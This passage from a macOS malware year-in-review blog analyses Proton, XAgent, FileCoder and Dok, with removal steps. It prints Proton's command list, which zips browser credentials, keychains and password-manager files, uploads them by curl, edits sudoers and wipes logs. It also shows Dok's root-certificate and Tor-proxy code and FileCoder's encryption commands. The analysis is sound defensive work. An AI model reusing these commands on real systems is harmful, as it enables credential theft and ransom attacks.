%rax, %rdi\r\n0x100017589 \u003c+265\u003e: callq 0x100049dae\r\n0x10001758e \u003c+270\u003e: movq %rax, %r13\r\n(lldb) po $rdi\r\nRNDecryptor\r\n(lldb) x/s $rsi\r\n0x10004db2b: \"decryptData:withPassword:error:\"\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 24 of 67\n\n(lldb) po $rcx\r\n9fe4a0c3b63203f096ef65dc98754243979d6bd58fe835482b969aabaaec57e\r\nAnd what is in this encrypted file? A massive list of commands and configuration values.\r\nif [ -f %@/.crd ]; then cat %@/.crd; else echo failure; fi,\r\nif [ -f %@/.ptrun ]; then echo success; fi,\r\ntouch %@/.ptrun;,\r\ncurl,\r\nhttps://%@/kukpxx8lnldxvbma8c4xqtar/auth?B=%@\u0026U=%@\u0026S=%@,\r\necho '%@' | sudo -S echo success;,\r\nrm -rf %@/%@.app %@;,\r\nrm -rf ~/Library/LaunchAgents/%@*; ,\r\ncurl %@ -o %@ \u0026\u0026 sudo chmod 777 %@;,\r\nHandBrake needs to install additional codecs. Enter your password to allow this.,\r\nscreencapture -x %@/scr%@.png,\r\nhttps://%@/api/upload,\r\n%@/scr%@.png,\r\nyyyy-MM-dd HH:mm:ss zzz,\r\nping -c 1 %@ 2\u003e/dev/null \u003e/dev/null \u0026\u0026 echo 0,\r\n%@.app,\r\ncat %@/.crd,\r\nif [ -f %@/.bcrd ]; then cat %@/.bcrd; else echo failure; fi,\r\necho '%@:%@:%@' \u003e %@/.crd; ,\r\necho 'printf \"\\033[8;1;1t\"; echo \"%@\" | sudo -S sh -c \"echo 'Defaults !tty_tickets' \u003e\u003e /etc/sudoers\"; killall Terminal; sleep 1;'\r\n\u003e ~/Library/sco.command; chmod 777 ~/Library/sco.command; open ~/Library/sco.command \u0026\u0026 sleep 2.7; rm -rf\r\n~/Library/sco.command;,\r\necho '%@:%@:%@' \u003e %@/.crd,\r\nAKADOMEDO,\r\nCFBundleExecutable,\r\n@%@/proton.zip,\r\n/bin/sh,\r\nhttps://%@,\r\n-c,\r\na%@=`curl -s ,\r\napi_key=%@\u0026cts=%@%@,\r\n-F api_key=%@ -F cts=%@ -F signature=%@ https://%@/api/%@`; echo $a%@;,\r\necho '%@' | sudo -S rm -rf %@ %@/*.zip,\r\ncat %@/.crd,\r\nhcresult=`curl -s --connect-timeout 10 %@` \u0026\u0026 echo $hcresult;,\r\ntype,\r\nname,\r\npath,\r\nsize,\r\ncreation_date,\r\nmodification_date,\r\nfolders,\r\nfiles,\r\ntotal_folders,\r\ntotal_files,\r\nfolder,\r\n--,\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 25 of 67\n\nrm -rf %@,\r\n%@/.str.txt,\r\n-O -J https://%@,\r\n0aaf7a0da92119ccf0ba,\r\n%@/.tmpdata,\r\nexpiration_date,\r\ngrace_period,\r\nos_version,\r\nchecksum,\r\n%@/.hash,\r\ncodesign -dv %@,\r\nVOID,\r\ncd %@; curl,\r\nhcresult=`curl -sL\r\nhttps://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec` \u0026\u0026\r\necho $hcresult;, zip %@/CR.zip ~/Library/Application\\ Support/Google/Chrome/Profile\\ 1/Login\\ Data\r\n~/Library/Application\\ Support/Google/Chrome/Profile\\ 1/Cookies ~/Library/Application\\ Support/Google/Chrome/Profile\\\r\n1/Bookmarks ~/Library/Application\\ Support/Google/Chrome/Profile\\ 1/History ~/Library/Application\\\r\nSupport/Google/Chrome/Profile\\ 1/Web\\ Data; zip %@/CR_def.zip ~/Library/Application\\\r\nSupport/Google/Chrome/Default/Login\\ Data ~/Library/Application\\ Support/Google/Chrome/Default/Cookies\r\n~/Library/Application\\ Support/Google/Chrome/Default/Bookmarks ~/Library/Application\\\r\nSupport/Google/Chrome/Default/History ~/Library/Application\\ Support/Google/Chrome/Default/Web\\ Data; ,\r\nzip -r %@/FF.zip ~/Library/Application\\ Support/Firefox/$(sh %@/mozilla.sh)/cookies.sqlite ~/Library/Application\\\r\nSupport/Firefox/$(sh %@/mozilla.sh)/formhistory.sqlite ~/Library/Application\\ Support/Firefox/$(sh\r\n%@/mozilla.sh)/logins.json ~/Library/Application\\ Support/Firefox/$(sh %@/mozilla.sh)/logins.json; ,\r\nzip -r %@/SF.zip ~/Library/Cookies ~/Library/Safari/Form\\ Values; ,\r\nzip -r %@/OP.zip ~/Library/Application\\ Support/com.operasoftware.Opera/Login\\ Data ~/Library/Application\\\r\nSupport/com.operasoftware.Opera/Cookies ~/Library/Application\\ Support/com.operasoftware.Opera/Web\\ Data; ,\r\nkillall Console; killall Wireshark; rm -rf %@; ,\r\nmkdir -p %@ %@ ~/Library/LaunchAgents/; chmod -R 777 %@ %@; zip -r %@/KC.zip ~/Library/Keychains/\r\n/Library/Keychains/; %@ %@ %@ %@ zip -r %@/GNU_PW.zip ~/.gnupg ~/Library/Application\\ Support/1Password\\ 4\r\n~/Library/Application\\ Support/1Password\\ 3.9; zip -r %@/proton.zip %@; %@ echo success; , cp -R %@ %@/%@; mv\r\n%@/%@/Contents/MacOS/%@ %@/%@/Contents/MacOS/%@; mv %@/%@/Contents/Resources/Info_.plist\r\n%@/%@/Contents/Info.plist; mv %@/%@/Contents/Resources/%@.plist ~/Library/LaunchAgents/%@.plist; echo success;\r\n,\r\nsed -i -e 's/P_MBN/%@/g' ~/Library/LaunchAgents/%@.plist; sed -i -e 's=P_UPTH=%@/%@/Contents/MacOS/%@=g'\r\n~/Library/LaunchAgents/%@.plist; chmod 644 ~/Library/LaunchAgents/%@.plist; codesign --remove-signature %@/%@;\r\nrm -rf %@/%@/Ic*; launchctl load ~/Library/LaunchAgents/%@.plist; %@ ,\r\nACTION,\r\nCONSOLE,\r\nFM,\r\nPROC,\r\nSSH_DID_CONNECT,\r\nSSH_DID_TERMINATE,\r\nclsock,\r\n_STROKES,\r\nscreencam,\r\nexec_pointer,\r\nssh_bind_port,\r\nprocs,\r\ntotal_procs,\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 26 of 67\n\nSSH_DID_NOT_CONNECT,\r\n/Library/Extensions/LittleSnitch.kext,\r\n/Library/Extensions/Radio Silence.kext,\r\n/Library/Extensions/HandsOff.kext,\r\n%@/.tmpdata,\r\n%@/updated.license,\r\nlicense_enforce,\r\nmv %@ %@,\r\nhandbrakestore.com,\r\nhandbrake.cc,\r\nluwenxdsnhgfxckcjgxvtugj.com,\r\n6gmvshjdfpfbeqktpsde5xav.com,\r\nkjfnbfhu7ndudgzhxpwnnqkc.com,\r\nyaxw8dsbttpwrwlq3h6uc9eq.com,\r\nqrtfvfysk4bdcwwwe9pxmqe9.com,\r\nfyamakgtrrjt9vrwhmc76v38.com,\r\nkcdjzquvhsua6hlfbmjzkzsb.com,\r\nypu4vwlenkpt29f95etrqllq.com,\r\nnc -G 20 -z 8.8.8.8 53 \u003e/dev/null 2\u003e\u00261 \u0026\u0026 echo success,\r\necho '%@' \u003e /tmp/public.pem; openssl rsautl -verify -in %@/.tmpdata -pubin -inkey /tmp/public.pem,\r\na90=`curl -s --connect-timeout 10 -o /tmp/au https://%@/rsa` \u0026\u0026 echo \u0026\u0026 echo '%@' \u003e /tmp/au.pub \u0026\u0026 echo success,\r\nopenssl rsautl -verify -in /tmp/au -pubin -inkey /tmp/au.pub,\r\nrm -rf /tmp/*,\r\nsudo -k; echo '%@' | sudo -S rm -rf /var/log/* /Library/Logs/* \u0026\u0026 echo success;,\r\nmv %@/.crd %@/.bcrd,\r\nsudo -k\r\nReading those these commands confirms the advertised capabilites (e.g. screencapture, etc.) We can also see that it will\r\ncollect and exfiltrate sensitive user data such as 1Password files, browser login data, keychains, etc:\r\nzip %@/CR.zip ~/Library/Application\\ Support/Google/Chrome/Profile\\ 1/Login\\ Data ~/Library/Application\\\r\nSupport/Google/Chrome/Profile\\ 1/Cookies\r\nzip -r %@/KC.zip ~/Library/Keychains/ /Library/Keychains/; %@ %@ %@ %@ zip -r %@/GNU_PW.zip ~/.gnupg\r\n~/Library/Application\\ Support/1Password\\ 4 ~/Library/Application\\ Support/1Password\\ 3.9; zip -r %@/proton.zip %@;\r\n%@ echo success\r\n disinfection:\r\nAs Proton persists as Launch Agent, it's trivially to manually remove from an infected system. A slight complication arises\r\nas each variant uses a different file name (for both the Launch Agent plist list, and persistent binary). A tool such as\r\nKnockKnock, which displays persistently installed software, can be used to identify the malware's Launch Agent plist. For\r\nexample below, KnocKKnock has detected variant 'C', (/Library/LaunchAgents/com.Eltima.UpdaterAgent.plist):\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 27 of 67\n\nOnce the malicious Launch Agent plist has been determined, one can remove the malware from an infected system via the\r\nfollowing steps (here, file naems are specific to variant 'C'):\r\n1. Unload the malware's persistent launch agent via the 'launchctl unload' command\r\n$ launchctl unload /Library/LaunchAgents/com.Eltima.UpdaterAgent.plist\r\n2. Remove the malicious launch agent plist file com.Eltima.UpdaterAgent.plist\r\n3. Remove the malware's persistent binary: /Library/.rand/updateragent.app\r\nXAgent:\r\n XAgent\r\nfound: Feburary, BitDefender/PaloAlto Networks\r\ninfection: via OSX/Komplex\r\nfeatures: fully-featured backdoor with a propensity for 'intel-related' data (e.g. iOS backups, etc.)\r\ndisinfection: kill process (and remove OSX/Komplex)\r\nwriteups:\r\n\"XAgentOSX: Sofacy's XAgent macOS Tool\" (PaloAlto Networks)\r\n\"OSX/Proton.B, a brief analysis, at 6 miles up\" (P. Wardle/Objective-See)\r\n\"Dissecting the APT28 Mac OS X Payload\" (BitDefender)\r\nOSX/XAgent is APT28/Fancy Bear's fully-featured 2nd-stage macOS implant, installed via a 1st-stage implant,\r\nOSX/Komplex.\r\n infection:\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 28 of 67\n\nIn late 2016, PaloAlto Networks discovered a new macOS backdoor, OSX/Komplex, that was \"associated with the Sofacy\r\ngroup [APT28]\". In their writeup titled, Sofacy's 'Komplex' OS X Trojan they described it's infection vector, persistence, and\r\nfeatures, noting amongst other things: \"it is capable of downloading additional files...\".\r\nI discussed Komplex both in the Objective-See \"Mac Malware of 2016\" blog post, as well as in an RSA talk on the same\r\ntopic:\r\nDuring my presentation, I noted that it seemed reasonable to assume that Komplex (which is rather a basic piece of\r\nmalware), was simply a 1st-stage implant that likely downloaded and executed a 2nd-stage (more feature-complete), implant\r\non targets of interest. With the discovery of XAgent, this was largely confirmed! Specifically BitDefender who performed a\r\nrather indepth analysis on XAgent state:\r\n\"[the Komplex payload] is the final component of the Komplex malware, with the sole purpose of downloading and\r\nexecuting a file, as requested by the C\u0026C servers.\r\nIn other words, Komplex is an APT28/Sofacy component that can be distributed via email, disguised as a PDF document, to\r\nestablish a foothold in a system. Once it infects the host, it can download and run the next APT28/Sofacy component, which\r\n- to the best of our knowledge - is the XAgent malware...\r\nOur assumption is guided by hard evidence included in the binary. Our forensics endeavor revealed a number of indicators\r\nthat made us think XAgent was distributed via Komplex malware\r\n\"\r\nPaloAlto Networks also echos this noting: \"We believe it is possible that Sofacy uses Komplex to download and install the\r\nXAgentOSX tool to use its expanded command set on the compromised system.\"\r\nThus in other words, XAgent may not have an independent infection vector, but instead relies on OSX/Komplex infections.\r\n persistence:\r\nAs of yet, I have not uncovered anything that indicates that XAgent actually persists. None of the analysis reports (from the\r\nAV companies) mentions persistence, and reversing the malware's binary doesn't reveal any (apparent) persistence logic.\r\nCould this means its persistence mechanism just hasn't been figured out yet? Possibly. However, I think there may be a more\r\nplausible answer, that involves XAgent's relationship with Komplex\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 29 of 67\n\nRecall that XAgent is downloaded and executed by Komplex. That is to say, it is dependent on Komplex, at least in terms of\ngetting onto macOS systems. Now, Komplex is persistent, via the Launch Agent\n~/Library/LaunchAgents/com.apple.updates.plist file:\n$ cat ~/Library/LaunchAgents/com.apple.updates.plist\n?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\nLabelcom.apple.updatesProgramArguments/Users/Shared/.local/kextdRunAtLoad ...\nAs the RunAtLoad key is set to true, each time an infected system is rebooted, Komplex (/Users/Shared/.local/kextd), will\nbe automatically (re)executed by the OS. Once Komplex is running, it will check in with it's command \u0026 control servers.\nDepending on the configuration of these servers or tasking from the remote attackers, a command to restart XAgent could\nperhaps be issued. Or, Xagent could be fully (re)downloaded and (re)executed. This approach would minimize the footprint\nof XAgent, as persistence events (i.e. the creation of a Launch Agent plist file) is both 'noisy' and trivial to detect.\nAnother scenario that could explain the lack of persistence may be that the attackers did not need (nor want) XAgent to\npersist. Running it once (via Komplex), collecting all data of intelligence value, then (possibly) issuing a command to delete\nthe XAgent binary would certainly reduce the likelyhood of its detection. As 2nd-stage implants such as XAgent usually\nrepresent a significant development effort (both in terms of time and cost), attackers will often take steps (such as\nuploaded/execute/delete) to prevent their detection and ensure their longevity!\n features:\nXAgent is a fully-featured macOS backdoor, with a propensity for the collection of data that may hold intelligence value.\nFor example, dumping the Objective-C class information via jtool, we see classes and methods responsible for keylogging,\napp injection, screen capturing, password stealing, and even discovery of iOS backups:\n$ ./jtool -d objc -v XAgent\n@interface Keylogger\n/* 0 - 0x100010708 */ - init;\n/* 1 - 0x1000108f2 */ - initEventTapAndStartRunLoop;\n/* 2 - 0x1000109fa */ - setAccessibilityApplication;\n...\n/* 7 - 0x100010e80 */ - start;\n/* 8 - 0x100010fad */ - stop;\n...\n/* 11 - 0x100011030 */ - sendLog;\n...\n@interface InjectApp\n/* 0 - 0x10000fb18 */ - init;\n/* 1 - 0x10000fb45 */ - isInjectable:;\nhttps://objective-see.com/blog/blog_0x25.html\nPage 30 of 67\n\n/* 2 - 0x10000fbe3 */ - sendEventToPid:;\r\n/* 3 - 0x10000fdff */ - injectRunningApp;\r\n@interface ScreenShot /* 0 - 0x100015c38 */ - takeScreenShot;\r\n/* 1 - 0x100015c97 */ - convertImageToData:;\r\n/* 2 - 0x100015dc4 */ - takeScreenShotImage;\r\n@interface Password /* 0 - 0x10001662d */ - init;\r\n...\r\n/* 4 - 0x100016dcb */ - getFirefoxPassword;\r\n@interface MainHandler\r\n...\r\n/* 11 - 0x10000b9d7 */ - showBackupIosFolder;\r\n@interface RemoteShell\r\n...\r\n/* 5 - 0x100018ccd */ - checkBackupIosDeviceFolder;\r\nTaking a peak at the malware's decompilation for the 'checkBackupIosDeviceFolder' method reveals it invoking popen to\r\nexecute ls -la ~/Library/Application\\ Support/MobileSync/Backup/. This will, as its name suggests, check (or list) and iOS\r\nbackups stored on the infected Mac. Obviously iOS backups contain an (unparalled?) wealth of data and information!\r\nvoid * -[RemoteShell checkBackupIosDeviceFolder](void * self, void * _cmd) {\r\n   ...\r\n   rbx = popen(\"ls -la ~/Library/Application\\ Support/MobileSync/Backup/\", \"r\");\r\nNote: for an interesting connection between XAgent and the Italian HackingTeam, see Objective-See's blog post, From Italy\r\nWith Love? Finding HackingTeam Code in Russian Malware.\r\nIn terms of other features, as shown in BitDefender's report, \"Dissecting the APT28 Mac OS X Payload\", XAgent\r\nunsurprisingly also supports more prosaic commands:\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 31 of 67\n\ndisinfection:\r\nAs XAgent does not appear to persist itself, removing it simply involves terminating the backdoor and deleting its binary.\r\nUnfortunately, the malware contains logic to generate a random path and name for itself, so figuring out the location of the\r\nbackdoor at first, seems complicated. Below is the decompilation of the generateRandomPathAndName method, which is\r\nresponsible for implementing this logic:\r\nvoid * +[Launcher generateRandomPathAndName](void * self, void * _cmd) {\r\n   r15 = [NSArray arrayWithObjects:@\"kshd\", @\"paxs\", @\"exprd\", @\"rcp\", @\"sync\", @\"kex\", @\"zsc\",\r\n          @\"scpo\", @\"ddl\", @\"update\", @\"zsg\", @\"rep\", @\"skgc\", ...\"];\r\n       var_38 = r15;\r\n   rax = [NSArray arrayWithObjects:@\".localized\", @\".com.apple.kshd\", @\".com.apple.erx\",\r\n          @\".com.apple.fsg\", @\".com.apple.ulk\", @\".com.apple.wsat\", ..., 0x0];\r\n   r14 = [rax count];\r\n   var_40 = [r15 count];\r\n   r15 = NSHomeDirectory();\r\n   r14 = [rax objectAtIndex:[Launcher randomInteger:0x0 max:r14]];\r\n   r12 = [NSString stringWithFormat:@\"%@/Library/Assistants/.local/%@\", r15, r14];\r\n   rbx = [NSFileManager defaultManager];\r\n   [rbx createDirectoryAtPath:r12 withIntermediateDirectories:0x1 attributes:0x0 error:0x0];\r\n   rbx = [var_38 objectAtIndex:[Launcher randomInteger:0x0 max:var_40]];\r\n   r14 = [NSString stringWithFormat:@\"%@/%@\", r12, rbx];\r\n   return rax;\r\n}\r\nAs can be seen, the malware will randomly generate a (sub)directory and name for itself. However as the path is not fully\r\nrandomized (i.e. it starts with ~/Library/Assistants/.local/), one can simply look for a running process who's path is prefixed\r\nwith that directory.\r\nSince ~/Library/Assistants/.local/ is a non-standard directory created by the malware, if one is infected there should only be\r\na single running process running out of this directory:\r\n$ ps aux | grep -i /Library/Assistants/.local\r\nuser 666 /Users/user/Library/Assistants/.local/.com.apple.kshd/mpil\r\nKill this process (e.g. kill -9 666), and delete the ~/Library/Assistants/.local/ directory to cleanup an XAgent infection.\r\nAs noted though, XAgent is dependent Komplex. Thus, if an XAgent infection is found, check for Komplex as well (details\r\nhere).\r\nFileCoder (FindZip/Patcher):\r\n FileCoder (FindZip/Patcher)\r\nfound: Feburary, ESET\r\ninfection: Fake 'Patcher' Applications\r\nfeatures: file encryption for ransom\r\ndisinfection: terminate application\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 32 of 67\n\nFileCoder (FindZip/Patcher)\r\nwriteups: \"New crypto-ransomware hits macOS\" (ESET)\r\nThis poorly coded piece of macOS ransomware, encrypts all user files with (pseudo)randomly generated encryption key that\r\nis neither saved, nor transmitted to the remote attacker. Fortunately a 'known plaintext attack' can decrypt ransomed files!\r\n infection:\r\nIt's a well known 'security mantra' that running apps related to pirating software is a terrible idea! And FileCoder\r\n(FindZip/Patcher) is a perfect example of why. Distributed via BitTorrent distro sites, this malware masquerades as software\r\nable to crack (or patch) popular applications, such as Adobe Premiere Pro and Microsoft Office.\r\nIn their report, \"New crypto-ransomware hits macOS\", ESET researchers provide the following screen shot of the malware\r\n(\"ostensibly an application for pirating popular software\"):\r\nIf the user downloads and attempts to run the application (for example to crack Adobe or Microsoft products), Gatekeeper\r\nshould block the malware. This is due to the fact, that though the malware is signed it is done so 'ad-hoc' - meaning it is not\r\nsigned by Apple (or by an Apple Developer ID). This can be seen via jtool:\r\n$ ./jtool --sig \"Office 2016 Patcher.app/Contents/MacOS/Office 2016 Patcher\"\r\nBlob at offset: 43776 (9936 bytes) is an embedded signature\r\nCode Directory (339 bytes)\r\n   Version: 20100\r\n   Flags: adhoc (0x2)\r\n   CodeLimit: 0xab00\r\n   Identifier: NULL.prova (0x30)\r\n   CDHash: 0d35855003ce4f920addb805fb240786443169c4 (computed)\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 33 of 67\n\nOr, if one prefers a UI application to view signing information, my WhatsYourSign Finder extension, will display this\r\ninformation as well:\r\nNow, if the user disables Gatekeeper, or explicitly agrees to allow the malicious application to execute, they will become\r\ninfected.\r\n persistence:\r\nAs is often the case with ransomware, which has no need to persist (it simply encrypts users' files, then exits), FileCoder\r\nmakes no effort to install itself persistently. From the malware author's point of view, avoding the need to persist simplifies\r\nthe malware creation process.\r\n features:\r\nFileCode does one thing; encrypt user files for ransom. When executed it display a window with a 'START' button:\r\nClicking this button executes the function, sub_100001f50. Extracting strings from this massive function reveals its likely\r\npurpose; encrypting user files:\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 34 of 67\n\nPress START button to crack/patch Office 2016\r\nPatching Office Please Wait\r\nProcess 0/3\r\n/Documents/README!.txt\r\n...\r\n/usr/bin/find\r\n-iname\r\nREADME!.txt-print\r\nexec\r\ntouch\r\n-mt\r\n201002130000\r\n{}\r\n;\r\n/Users/\r\n-not\r\nzip\r\n-0\r\n-P\r\n{}.crypt\r\nrm\r\nPatching Office Please Wait\r\nIt may take up to 10 minutes\r\nProcess 1/3\r\n/Desktop/README\r\n/Desktop/HOW_TO_DECRYPT\r\n/Desktop/DECRYPT\r\n-maxdepth\r\nPatching Office Please Wait\r\nIt may take up to 10 minutes\r\nProcess 2/3\r\n/Volumes/\r\n/usr/bin/diskutil\r\nsecureErase\r\nfreespace\r\nDONE!\r\nRead the README.txt file on your Desktop!\r\nRunning a process monitor (such as my open-source ProcInfo tool), confirms the malware's malicious behavior. Specifically\r\nwe can see it executing the built-in find utility to, well, find user files, then executing the zip utilty, with the -P flag create a\r\npassword protected zip file (password here, gpcwPophFOZQjMDUnfQoqv9Ry):\r\n# ./procInfo\r\nprocess start:\r\n  pid: 1258\r\n  path: /usr/bin/find\r\n  user: 501\r\n  args: (\r\n    \"/usr/bin/find\",\r\n    \"/Users/\",\r\n    \"-not\",\r\n    \"-iname\",\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 35 of 67\n\n\"README!.txt\",\r\n    \"-print\",\r\n    \"-exec\",\r\n    zip,\r\n    \"-0\",\r\n    \"-P\",\r\n    gpcwPophFOZQjMDUnfQoqv9Ry,\r\n    \"{}.crypt\",\r\n    \"{}\",\r\n    \";\",\r\n    \"-exec\",\r\n    rm,\r\n    \"{}\",\r\n    \";\",\r\n    \"-exec\",\r\n    touch,\r\n    \"-mt\",\r\n    201002130000,\r\n    \"{}.crypt\",\r\n    \";\"\r\n)\r\nOnce the ransomware as encrypted user files (under /Users and /Volumes), a README!.txt can be found on the desktop.\r\nOpening this, reveals the ransom instructions:\r\nAs the key generated to encrypt the user files is generated (pseudo)randomly and neither stored or transmitted to the remote\r\nattacker, the file won't be 'decryptable' even if the user pays the bitcoin ransom.\r\nLuckily, Sophos describes a trivial method to decrypt the ransomed files! In short, the encryption scheme used by zip to\r\ncreate password protected archives, is suspectible to a known plaintext attack. Since the malware 'depends' on zip to encrypt\r\nthe user files, the whole ransoming scheme falls apart. Win one for the users!\r\n disinfection:\r\nAs the malware doesn't persist, there really isn't much to do to disinfect a system besides terminate and delete the\r\nransomware:\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 36 of 67\n\n$ ps aux | grep Patcher\r\nuser 1155 ~/Desktop/Office 2016 Patcher.app/Contents/MacOS/Office 2016 Patcher\r\n$ kill -9 1155\r\nOf course by this time, (if the ransomware is already running) it's likely too late!\r\n Dok (Retefe)\r\nfound: April, CheckPoint\r\ninfection: emails campaign with malware attached\r\nfeatures: web traffic MitM (to steal banking info)\r\ndisinfection: remove login item or launch agent(s)\r\nwriteups:\r\n\"OSX Malware is Catching Up \u0026 wants to Read Your HTTPS Traffic\" (CheckPoint)\r\n\"New OSX.Dok malware intercepts web traffic\" (MalwareBytes)\r\nA macOS port of Windows 'Retefe' banking trojan, this malware installs a malicious proxy server to Man-in-the-Middle\r\n(MitM) all web traffic in order to sniff out victims' bank credentials and manipulate traffic to gain access to financial\r\naccounts.\r\n infection:\r\nAs noted by the security researchers at CheckPoint who originally discovered OSX/Dok (read their writeup here), Dok\r\ntargets users via an email: \"[Dok] is the first major scale malware to target OSX users via a coordinated email phishing\r\ncampaign.\"\r\nBelow is a screen-capture of one such phishing email, targeting German users (image credit CheckPoint):\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 37 of 67\n\nAttached to the malicious emails, is a zip file (Dokument.zip), that contains the malware. Users that naively believe the\r\ninstructions in the email and unzip Dokument.zip, will find a single file named Dokument:\r\nBy using a (rather pixelated) icon that mimics Apple's 'Preview' application, that attacker clearly hopes to trick the user to\r\nopening this file. By using WhatsYourSign we can see this file is not a document, but in fact a signed application (though\r\nnow Apple has revoked the certificate):\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 38 of 67\n\nIf the user opens the application, and clicks thru the standard \"is an application downloaded from the Internet. Are you sure\r\nyou want to open it?\" warning dialog, they will become infected.\r\n persistence:\r\nSomewhat interestingly, OSX/Dok persists in two phases. First as a Login Item, then as Launch Agents.\r\nWhen Dok is (naively) launched by the user, it will executed logic to persist as a Login Item. As their name implies, Login\r\nItems will execute an application when the user logs in. Apple describes how to create a Login Item both manually and\r\nprogrammatically.\r\nTo persist itself as a Login Item, Dok will invoke the AddLoginScript method:\r\nvoid -[AppDelegate AddLoginScript](void * self, void * _cmd) {\r\n   r14 = [NSDictionary new];\r\n   r15 = [[NSString stringWithFormat:@\"tell application \\\"System Events\\\" to make\r\n         login item at end with properties {path:\\\"%@\\\"}\", self-\u003eneedLocation] retain];\r\n   rbx = [[NSAppleScript alloc] initWithSource:r15];\r\n   var_28 = r14;\r\n   [rbx executeAndReturnError:\u0026var_28];\r\n   return;\r\n}\r\nAs can be seen in the AddLoginScript decompilation, Dok utilizes AppleScript to create the Login Item. This approach is\r\nsomewhat simpler than adding a Login Item purely via APIs (such as SMLoginItemSetEnabled).\r\nThe installed Login Item will show up in the UI (image credit CheckPoint):\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 39 of 67\n\nIn order to elevate its privileges to persist its payload (described below), Dok displays a fake (full-screen) update window\r\nthat contains a single 'Update All' button. When this button is clicked, the malware will display an authorization dialog:\r\nIt's likely that the user will enter their credentials at some point, since as noted by Thomas Reed: \"[the screen will] remain\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 40 of 67\n\nstubbornly on the screen and will come back on restart\".\nArmed with the user's credentials the malware will perform various nefarious actions, including the creation of two\npersistent Launch Agents property lists: com.apple.Safari.pac.plist and com.apple.Safari.proxy.plist. The code for this can be\nfound in the InstallTor method:\n void -[AppDelegate InstallTor](void * self, void * _cmd) {\n rbx = [[var_38 stringByAppendingPathComponent:@\"com.apple.Safari.pac\",\n @\"/usr/local/bin/socat\", r8];\n r14 = [[rbx stringByAppendingPathExtension:@\"plist\", @\"/usr/local/bin/socat\", r8];\n rbx = [[var_38 stringByAppendingPathComponent:@\"com.apple.Safari.proxy\",\n @\"/usr/local/bin/socat\", r8];\n r12 = [[rbx stringByAppendingPathExtension:@\"plist\", @\"/usr/local/bin/socat\", r8];\n rax = [NSMutableDictionary alloc];\n rax = [rax init];\n\nr14 = rax;\n [rax setObject:@\"com.apple.Safari.pac\" forKeyedSubscript:@\"Label\",\n @\"/usr/local/bin/brew\"];\n rax = [NSString stringWithFormat:@\"SOCKS4A:127.0.0.1:%@:80,socksport=9050\",\n @\"paoyu7gub72lykuk.onion\"];\n\nrbx = [[NSArray arrayWithObjects:@\"/usr/local/bin/socat\", @\"tcp4-LISTEN:5555,\n reuseaddr,fork,keepalive,bind=127.0.0.1\", rax, 0x0] retain];\n\n[r14 setObject:rbx forKeyedSubscript:@\"ProgramArguments\", rax];\n rbx = [@(YES) retain];\n [r14 setObject:rbx forKey:@\"RunAtLoad\", rax];\n\nrbx = [@(YES) retain];\n [r14 setObject:rbx forKey:@\"KeepAlive\", rax];\n [r14 writeToFile:var_50 atomically:0x1, rax];\n\nDumping either of these plists, we can see the malware has persisted socat (a well-known proxy):\n $ cat ~/Library/LaunchAgents/com.client.client.plist ?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e KeepAliveLabelcom.apple.Safari.pacProgramArguments/usr/local/bin/socattcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 https://objective-see.com/blog/blog_0x25.html\nPage 41 of 67\n\nSOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:80,socksport=9050RunAtLoad ... As the RunAtLoad key in the plists has been set to true, socat will be automatically started each time the system is rebooted\nand the user logs in.\n features:\nThomas Read, who also analyzed OSX/Dok, describes the malware's main goal:\n\"[OSX.Dok] uses sophisticated means to monitor-and potentially alter-all HTTP and HTTPS traffic to and from the infected\nMac. This means that the malware is capable, for example, of capturing account credentials for any website users log into,\nwhich offers many opportunities for theft of cash and data.\"\nInstalling a proxy to MitM traffic is a common technique found in Windows banking trojans - who try to steal users' banking\ncredentials. As previous noted, Dok appears to be a Mac port of the Windows banking trojan 'Retefe.'\nLet's take a closer look at how the malware is able to proxy all web traffic on an infected host.\nFirst the malware kills all running browsers, by executing the CloseAllBrowsers method:\n void -[AppDelegate CloseAllBrowsers]\n {\n [@\"killall Safari\" runAsCommand];\n [@\"killall firefox\" runAsCommand];\n [@\"killall \\\"Google Chrome\\\"\" runAsCommand];\n return;\n }\nIt then installs a new root certificate, \"which allows the attacker to intercept the victim’s traffic using a Man in The Middle\n(MiTM) attack\" (Checkpoint). In order to install this certificate, the malware simply executes the security command, with\nthe add-trusted-cert flag. Looking at the InstallCert method we can see this logic:\n void -[AppDelegate InstallCert]\n {\n rbx = [[NSData dataWithBytes:0x100008680 length:*(int32_t *)dword] retain];\n var_38 = rbx;\n r13 = [[@\"/tmp/\" stringByAppendingPathComponent:@\"cert.der\"] retain];\n [rbx writeToFile:r13 atomically:0x0];\n\nr15 = [NSString stringWithFormat:@\"security add-trusted-cert -d -r trustRoot\n -k /Library/Keychains/System.keychain %@\", r13];\n r12 = [r15 runAsCommand];\n\nreturn;\n }\nHere's the installed certificate (image credit: CheckPoint):\nhttps://objective-see.com/blog/blog_0x25.html\nPage 42 of 67\n\nOnce the attacker's certificate has been installed, the malware invokes the InstallTor method. Unsurprisingly, this installs tor.\r\nIn order to install this (and other utilities most notable the proxy, socat), the malware first downloads and installs\r\nHomebrew:\r\n rbx = [NSString stringWithFormat:@\"sudo -u %@ echo |sudo -u %@ /usr/bin/ruby -e\r\n \\\"$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)\\\"\"];\r\n [rbx runAsCommand];\r\nThis methods also installs the aforementioned Launch Agent plist files, which ensure the proxy, socat, is always running.\r\nFinally, the malware 